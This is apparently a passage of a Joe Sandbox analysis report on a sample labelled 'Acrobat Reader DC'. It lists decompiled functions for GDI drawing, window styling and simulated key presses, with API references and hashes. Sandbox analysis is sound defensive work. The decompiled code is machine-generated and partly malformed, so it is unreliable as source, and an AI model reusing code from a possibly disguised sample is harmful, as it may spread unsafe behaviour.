								__edx = _v24;
								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
								__edx = _a4;
								__eax =  *_a4;
								__edx =  *_v8;
								__eax =  *_a4 + __ebx;
								__edx =  *_v8 + __edi;
								__eax = Ellipse(__esi, __edi, __ebx,  *_v8 + __edi,  *_a4 + __ebx);
								goto L23;
							case 3:
								__eax = MoveToEx(__esi, __edi, __ebx, 0);
								__eax = _v8;
								asm("fild dword [ecx+0x8]");
								__edx =  *(__eax + 8);
								_v12 =  &(_v12->x);
								_v12 =  &(_v12->x);
								_v32 = __fp0;
								asm("fild dword [eax+0x10]");
								__eax = __eax + 0x10;
								__esp = __esp - 8;
								_v68 = __fp0;
								_a4 =  &(_a4[4]);
								__fp0 = _v32;
								_v8 = __eax;
								 *__esp = __fp0;
								AngleArc(__esi, __edi, __ebx, __edx, ??, ??) = LineTo(__esi, __edi, __ebx);
								__eax = CloseFigure(__esi);
								goto L23;
							case 4:
								__eax = _v24;
								_t75 = __eax + 1; // 0xffffffff
								__edx = __ebx + _t75;
								_push(__ebx + _t75);
								__ebx = __ebx - __eax;
								_push(__edi + __eax + 1);
								__edi = __edi - __eax;
								L22:
								__eax = Rectangle(__esi, __edi, __ebx, ??, ??);
								goto L23;
							case 5:
								__eax = SetPixel(__esi, __edi, __ebx, _v20);
								goto L23;
							case 6:
								if(_t112 != 0) {
									_a11 = 1;
								}
								goto L23;
							case 7:
								_v24 = __edi;
								goto L23;
							case 8:
								goto L23;
						}
						L23:
						_t108 = _v28;
						_a4 = _a4 + 8;
						_v8 = _v8 + 8;
						_t99 =  &(_v12->x);
						_v12 = _t99;
					} while (_t99 <  *((intOrPtr*)(_t108 + 0xc)));
					_t100 = _v16;
					_t109 = _t108;
					L25:
					_t110 =  *((intOrPtr*)(_t109 + 4));
					_v28 = _t110;
					if(_t110 != 0) {
						_t109 = _v28;
						continue;
					}
					goto L26;
				}
			}



















                                  0x00447357
                                  0x0044735b
                                  0x0044735e
                                  0x00447363
                                  0x00447367
                                  0x0044736e
                                  0x00447371
                                  0x00447378
                                  0x0044737d
                                  0x00447581
                                  0x00447583
                                  0x00447591
                                  0x00447591
                                  0x00447388
                                  0x00447394
                                  0x0044739b
                                  0x004473a4
                                  0x00000000
                                  0x00000000
                                  0x004473b0
                                  0x004473b3
                                  0x004473b6
                                  0x004473b9
                                  0x004473ce
                                  0x004473d4
                                  0x00000000
                                  0x00000000
                                  0x004473e1
                                  0x00000000
                                  0x00447401
                                  0x00447407
                                  0x00447409
                                  0x0044740e
                                  0x0044740e
                                  0x00447413
                                  0x00447416
                                  0x0044741a
                                  0x0044741c
                                  0x0044741c
                                  0x00447422
                                  0x00447426
                                  0x00447428
                                  0x00447428
                                  0x0044742b
                                  0x0044743a
                                  0x00000000
                                  0x00000000
                                  0x00447444
                                  0x00447447
                                  0x0044744a
                                  0x0044744f
                                  0x00447452
                                  0x0044745c
                                  0x00447462
                                  0x00447470
                                  0x00447475
                                  0x00447478
                                  0x0044747c
                                  0x0044747d
                                  0x0044747f
                                  0x00000000
                                  0x00000000
                                  0x00447488
                                  0x0044748b
                                  0x00447490
                                  0x00447493
                                  0x00447498
                                  0x0044749d
                                  0x004474ac
                                  0x004474b1
                                  0x004474b4
                                  0x004474b9
                                  0x004474bb
                                  0x004474be
                                  0x004474c4
                                  0x00000000
                                  0x00000000
                                  0x004474d4
                                  0x004474dd
                                  0x004474e0
                                  0x004474e3
                                  0x004474e6
                                  0x004474e9
                                  0x004474ec
                                  0x004474ef
                                  0x004474f2
                                  0x004474f5
                                  0x004474fb
                                  0x004474ff
                                  0x00447502
                                  0x00447505
                                  0x00447508
                                  0x00447518
                                  0x0044751f
                                  0x00000000
                                  0x00000000
                                  0x00447536
                                  0x00447539
                                  0x00447539
                                  0x00447541
                                  0x00447542
                                  0x00447544
                                  0x00447545
                                  0x00447547
                                  0x0044754a
                                  0x00000000
                                  0x00000000
                                  0x0044752e
                                  0x00000000
                                  0x00000000
                                  0x004473ea
                                  0x004473f0
                                  0x004473f0
                                  0x00000000
                                  0x00000000
                                  0x004473f9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00447550
                                  0x00447553
                                  0x0044755b
                                  0x0044755e
                                  0x00447561
                                  0x00447562
                                  0x00447565
                                  0x0044756e
                                  0x00447571
                                  0x00447573
                                  0x00447573
                                  0x00447576
                                  0x0044757b
                                  0x00447385
                                  0x00000000
                                  0x00447385
                                  0x00000000
                                  0x0044757b

                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                  • CloseFigure.GDI32(?), ref: 0044751F
                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                  • String ID:
                                  • API String ID: 4082120231-0
                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004443FC(intOrPtr _a4, char* _a8) {
				signed int _v99;
				signed int _v100;
				signed int _v169;
				signed int _v242;
				signed int _v243;
				signed int _v244;
				char _v260;
				void* _t53;
				struct HWND__* _t54;
				intOrPtr _t68;
				char* _t102;
				intOrPtr _t103;

				_t103 = _a4;
				_t102 = _a8;
				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
					_t54 =  *(_t103 + 0x20);
					if(_t54 == 0 || GetParent(_t54) == 0) {
						if( *_t102 != 0) {
							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 1)) != 0) {
							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 2)) != 0) {
							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 3)) != 0) {
							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 4)) != 0) {
							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 2);
						}
						L43:
						return E004347A9(_t103);
					}
					if(GetKeyboardState( &_v260) != 0) {
						if( *_t102 != 0) {
							_v244 = _v244 ^ 0x00000080;
							_v100 = _v100 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 1)) != 0) {
							_v244 = _v244 ^ 0x00000080;
							_v99 = _v99 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 2)) != 0) {
							_v243 = _v243 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 3)) != 0) {
							_v242 = _v242 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 4)) != 0) {
							_v169 = _v169 ^ 0x00000080;
						}
						SetKeyboardState( &_v260);
					}
					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x101, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0xc0000001);
					}
					if( *((char*)(_t102 + 2)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x101, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0xc0000001);
					}
					_t68 =  *((intOrPtr*)(_t102 + 3));
					if(_t68 != 0) {
						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
							if(_t68 != 0) {
								PostMessageW( *(_t103 + 0x20), 0x101, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xc0000001);
								goto L30;
							}
						} else {
							PostMessageW( *(_t103 + 0x20), 0x105, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xe0000001);
							L30:
						}
					}
					if( *((char*)(_t102 + 4)) == 0) {
						goto L43;
					}
					PostMessageW( *(_t103 + 0x20), 0x101, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0xc0000001);
					return E004347A9(_t103);
				} else {
					return _t53;
				}
			}















                                  0x00444406
                                  0x0044440a
                                  0x00444410
                                  0x0044442e
                                  0x00444434
                                  0x0044457a
                                  0x00444589
                                  0x00444589
                                  0x00444592
                                  0x004445a1
                                  0x004445a1
                                  0x004445aa
                                  0x004445b6
                                  0x004445b6
                                  0x004445bf
                                  0x004445cb
                                  0x004445cb
                                  0x004445d4
                                  0x004445e0
                                  0x004445e0
                                  0x004445e5
                                  0x00000000
                                  0x004445eb
                                  0x00444458
                                  0x0044445f
                                  0x00444461
                                  0x00444467
                                  0x00444467
                                  0x0044446e
                                  0x00444470
                                  0x00444476
                                  0x00444476
                                  0x0044447d
                                  0x0044447f
                                  0x0044447f
                                  0x00444489
                                  0x0044448b
                                  0x0044448b
                                  0x00444495
                                  0x00444497
                                  0x00444497
                                  0x004444a4
                                  0x004444a4
                                  0x004444b3
                                  0x004444d4
                                  0x004444d4
                                  0x004444da
                                  0x004444f5
                                  0x004444f5
                                  0x004444f7
                                  0x004444fc
                                  0x00444502
                                  0x00444526
                                  0x00444541
                                  0x00000000
                                  0x00444541
                                  0x0044450a
                                  0x00444541
                                  0x00444541
                                  0x00444541
                                  0x00444502
                                  0x00444547
                                  0x00000000
                                  0x00000000
                                  0x00444566
                                  0x00444574
                                  0x004445f1
                                  0x004445f1
                                  0x004445f1

                                  APIs
                                  • GetParent.USER32(?), ref: 0044443B
                                  • GetKeyboardState.USER32(?), ref: 00444450
                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004445F4(intOrPtr _a4, char* _a8) {
				signed int _v99;
				signed int _v100;
				signed int _v169;
				signed int _v242;
				signed int _v243;
				signed int _v244;
				char _v260;
				void* _t53;
				struct HWND__* _t54;
				intOrPtr _t68;
				char* _t102;
				intOrPtr _t103;

				_t103 = _a4;
				_t102 = _a8;
				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
					_t54 =  *(_t103 + 0x20);
					if(_t54 == 0 || GetParent(_t54) == 0) {
						if( *_t102 != 0) {
							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 1)) != 0) {
							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 2)) != 0) {
							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 3)) != 0) {
							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 4)) != 0) {
							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 0);
						}
						L43:
						return E0043477C(_t103);
					}
					if(GetKeyboardState( &_v260) != 0) {
						if( *_t102 != 0) {
							_v244 = _v244 | 0x00000080;
							_v100 = _v100 | 0x00000080;
						}
						if( *((char*)(_t102 + 1)) != 0) {
							_v244 = _v244 | 0x00000080;
							_v99 = _v99 | 0x00000080;
						}
						if( *((char*)(_t102 + 2)) != 0) {
							_v243 = _v243 | 0x00000080;
						}
						if( *((char*)(_t102 + 3)) != 0) {
							_v242 = _v242 | 0x00000080;
						}
						if( *((char*)(_t102 + 4)) != 0) {
							_v169 = _v169 | 0x00000080;
						}
						SetKeyboardState( &_v260);
					}
					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x100, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0x00000001);
					}
					if( *((char*)(_t102 + 2)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x100, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0x00000001);
					}
					_t68 =  *((intOrPtr*)(_t102 + 3));
					if(_t68 != 0) {
						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
							if(_t68 != 0) {
								PostMessageW( *(_t103 + 0x20), 0x100, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x00000001);
								goto L30;
							}
						} else {
							PostMessageW( *(_t103 + 0x20), 0x104, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x20000001);
							L30:
						}
					}
					if( *((char*)(_t102 + 4)) == 0) {
						goto L43;
					}
					PostMessageW( *(_t103 + 0x20), 0x100, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0x00000001);
					return E0043477C(_t103);
				} else {
					return _t53;
				}
			}















                                  0x004445fe
                                  0x00444602
                                  0x00444608
                                  0x00444626
                                  0x0044462c
                                  0x00444766
                                  0x00444775
                                  0x00444775
                                  0x0044477e
                                  0x0044478d
                                  0x0044478d
                                  0x00444796
                                  0x004447a2
                                  0x004447a2
                                  0x004447ab
                                  0x004447b7
                                  0x004447b7
                                  0x004447c0
                                  0x004447cc
                                  0x004447cc
                                  0x004447d1
                                  0x00000000
                                  0x004447d7
                                  0x00444650
                                  0x00444657
                                  0x00444659
                                  0x0044465f
                                  0x0044465f
                                  0x00444666
                                  0x00444668
                                  0x0044466e
                                  0x0044466e
                                  0x00444675
                                  0x00444677
                                  0x00444677
                                  0x00444681
                                  0x00444683
                                  0x00444683
                                  0x0044468d
                                  0x0044468f
                                  0x0044468f
                                  0x0044469c
                                  0x0044469c
                                  0x004446ab
                                  0x004446c9
                                  0x004446c9
                                  0x004446cf
                                  0x004446e7
                                  0x004446e7
                                  0x004446e9
                                  0x004446ee
                                  0x004446f4
                                  0x00444718
                                  0x00444730
                                  0x00000000
                                  0x00444730
                                  0x004446fc
                                  0x00444730
                                  0x00444730
                                  0x00444730
                                  0x004446f4
                                  0x00444736
                                  0x00000000
                                  0x00000000
                                  0x00444752
                                  0x00444760
                                  0x004447dd
                                  0x004447dd
                                  0x004447dd

                                  APIs
                                  • GetParent.USER32(?), ref: 00444633
                                  • GetKeyboardState.USER32(?), ref: 00444648
                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0044982A(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12) {
				signed int _v8;
				signed char _t40;
				struct HWND__* _t42;
				long _t49;
				void* _t53;
				struct HWND__** _t58;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t72;
				struct HWND__* _t75;
				signed int _t79;
				long _t80;

				_t79 = _a8;
				_a8 = 0;
				if(E00441AF5(0x4a8630, _a4,  &_v8,  &_a4) != 0) {
					_t63 =  *0x4a8690; // 0x0
					_t64 =  *0x4a86a4; // 0xa71980
					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _v8 * 4))));
					_t58 =  *( *(_t64 + _a4 * 4));
					_t75 =  *_t58;
					if(_t79 == 0xffffffff) {
						L14:
						_t80 = _a12;
						if(_t80 != 0xffffffff) {
							_t49 = SetWindowLongW(_t75, 0xffffffec, _t80);
							_t72 =  *0x4a86a4; // 0xa71980
							_a8 = _t49;
							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + _a4 * 4)))) + 0x88)) == 0x13) {
								_a8 = SendMessageW(_t75, 0x1036, 0, _t80);
							}
						}
						_t40 = _t58[0x22];
						if(_t40 == 0xff || (_t40 & 0x000000ff) ==  *((intOrPtr*)(_v8 + 0x194))) {
							E00430B87(_v8, _t58, 1);
						} else {
							ShowWindow(_t75, 0);
						}
						_t42 = _t58[0x22];
						if(_t42 == 2 || _t42 == 3 || _t80 != 0xffffffff) {
							SetWindowPos( *_t58, 0, 0, 0, 0, 0, 0x27);
						}
						return 0 | _a8 != 0x00000000;
					} else {
						_t53 = (_t58[0x22] & 0x000000ff) + 0xfffffffe;
						if(_t53 > 0x14) {
							L13:
							_a8 = SetWindowLongW(_t75, 0xfffffff0, _t79 | 0x50000000);
							goto L14;
						} else {
							switch( *((intOrPtr*)(( *(_t53 + 0x4499c6) & 0x000000ff) * 4 +  &M004499AA))) {
								case 0:
									__esi = __esi | 0x00000004;
									goto L9;
								case 1:
									L9:
									_push(0);
									if((__esi & 0x00000800) == 0) {
										__esi = __esi | 0x00010000;
										SendMessageW(__edi, 0xcf, 0, ??);
									} else {
										SendMessageW(__edi, 0xcf, 1, ??);
									}
									goto L13;
								case 2:
									__esi = __esi | 0x0000000e;
									goto L13;
								case 3:
									__esi = __esi | 0x00000003;
									goto L13;
								case 4:
									__esi = __esi | 0x04000000;
									goto L13;
								case 5:
									return 0;
									goto L26;
								case 6:
									goto L13;
							}
						}
					}
				} else {
					return 0;
				}
				L26:
			}















                                  0x00449832
                                  0x00449843
                                  0x00449851
                                  0x0044985f
                                  0x0044986a
                                  0x00449873
                                  0x0044987a
                                  0x0044987d
                                  0x00449882
                                  0x00449902
                                  0x00449902
                                  0x00449908
                                  0x0044990e
                                  0x00449914
                                  0x0044991a
                                  0x0044992c
                                  0x0044993d
                                  0x0044993d
                                  0x0044992c
                                  0x00449940
                                  0x00449948
                                  0x0044996a
                                  0x00449958
                                  0x0044995b
                                  0x0044995b
                                  0x0044996f
                                  0x00449977
                                  0x00449991
                                  0x00449991
                                  0x004499a5
                                  0x00449884
                                  0x0044988b
                                  0x00449891
                                  0x004498ef
                                  0x004498ff
                                  0x00000000
                                  0x00449893
                                  0x0044989a
                                  0x00000000
                                  0x004498b6
                                  0x00000000
                                  0x00000000
                                  0x004498b9
                                  0x004498b9
                                  0x004498c1
                                  0x004498db
                                  0x004498e1
                                  0x004498c3
                                  0x004498cb
                                  0x004498cb
                                  0x00000000
                                  0x00000000
                                  0x004498ac
                                  0x00000000
                                  0x00000000
                                  0x004498b1
                                  0x00000000
                                  0x00000000
                                  0x004498e9
                                  0x00000000
                                  0x00000000
                                  0x004498a9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044989a
                                  0x00449891
                                  0x00449853
                                  0x00449859
                                  0x00449859
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440D98 Relevance: 10.6, APIs: 7, Instructions: 119windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440D98(signed int _a4, intOrPtr _a8) {
				intOrPtr _t29;
				long _t31;
				intOrPtr _t32;
				signed int _t34;
				intOrPtr _t36;
				intOrPtr _t41;
				struct HWND__*** _t44;
				struct HWND__*** _t48;
				signed int _t54;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t69;
				signed int _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;
				void* _t86;
				void* _t90;

				_t29 =  *0x4a86a4; // 0xa71980
				_t74 = _a4;
				_t77 = _t74;
				_t31 = SendMessageW( *( *( *(_t29 + _t74 * 4))), 0xf0, 0, 0);
				if(_t31 != 0 || _a8 != _t31) {
					if(_t74 < 3) {
						L8:
						_t77 = _t77 + 1;
					} else {
						while(1) {
							_t64 =  *0x4a86a4; // 0xa71980
							_t48 =  *(_t64 + _t77 * 4);
							if( *_t48 == 0 || ( *_t48)[0x22] != 0x1a) {
								goto L8;
							}
							if((GetWindowLongW( *( *( *(_t64 + _t77 * 4))), 0xfffffff0) & 0x00020000) == 0) {
								_t77 = _t77 - 1;
								if(_t77 >= 3) {
									continue;
								} else {
									goto L8;
								}
							}
							goto L9;
						}
						goto L8;
					}
					L9:
					_t75 = _t74 + 1;
					_t86 = _t75 -  *0x4a86b4; // 0x2
					if(_t86 <= 0) {
						while(1) {
							_t62 =  *0x4a86a4; // 0xa71980
							_t44 =  *(_t62 + _t75 * 4);
							if( *_t44 == 0 || ( *_t44)[0x22] != 0x1a || (GetWindowLongW( *( *( *(_t62 + _t75 * 4))), 0xfffffff0) & 0x00020000) != 0) {
								goto L15;
							}
							_t75 = _t75 + 1;
							_t90 = _t75 -  *0x4a86b4; // 0x2
							if(_t90 <= 0) {
								continue;
							}
							goto L15;
						}
					}
					L15:
					_t76 = _t75 - 1;
					_t54 = _t77;
					if(_t77 <= _t76) {
						do {
							_t41 =  *0x4a86a4; // 0xa71980
							SendMessageW( *( *( *(_t41 + _t54 * 4))), 0xf1, 0, 0);
							_t54 = _t54 + 1;
						} while (_t54 <= _t76);
					}
					if(_a8 != 1) {
						_t32 =  *0x4a86a4; // 0xa71980
						_t34 = GetWindowLongW( *( *( *(_t32 + _t77 * 4))), 0xfffffff0);
						_t36 =  *0x4a86a4; // 0xa71980
						return SetWindowLongW( *( *( *(_t36 + _t77 * 4))), 0xfffffff0, _t34 | 0x00010000);
					}
					_t69 =  *0x4a86a4; // 0xa71980
					return SendMessageW( *( *( *(_t69 + _a4 * 4))), 0xf1, 1, 0);
				} else {
					return _t31;
				}
			}





















                                  0x00440d9b
                                  0x00440da2
                                  0x00440db6
                                  0x00440db8
                                  0x00440dc0
                                  0x00440dd1
                                  0x00440e0d
                                  0x00440e0d
                                  0x00440dd3
                                  0x00440dd8
                                  0x00440dd8
                                  0x00440dde
                                  0x00440de4
                                  0x00000000
                                  0x00000000
                                  0x00440e05
                                  0x00440e07
                                  0x00440e0b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00440e0b
                                  0x00000000
                                  0x00440e05
                                  0x00000000
                                  0x00440dd8
                                  0x00440e0e
                                  0x00440e0e
                                  0x00440e0f
                                  0x00440e15
                                  0x00440e18
                                  0x00440e18
                                  0x00440e1e
                                  0x00440e24
                                  0x00000000
                                  0x00000000
                                  0x00440e47
                                  0x00440e48
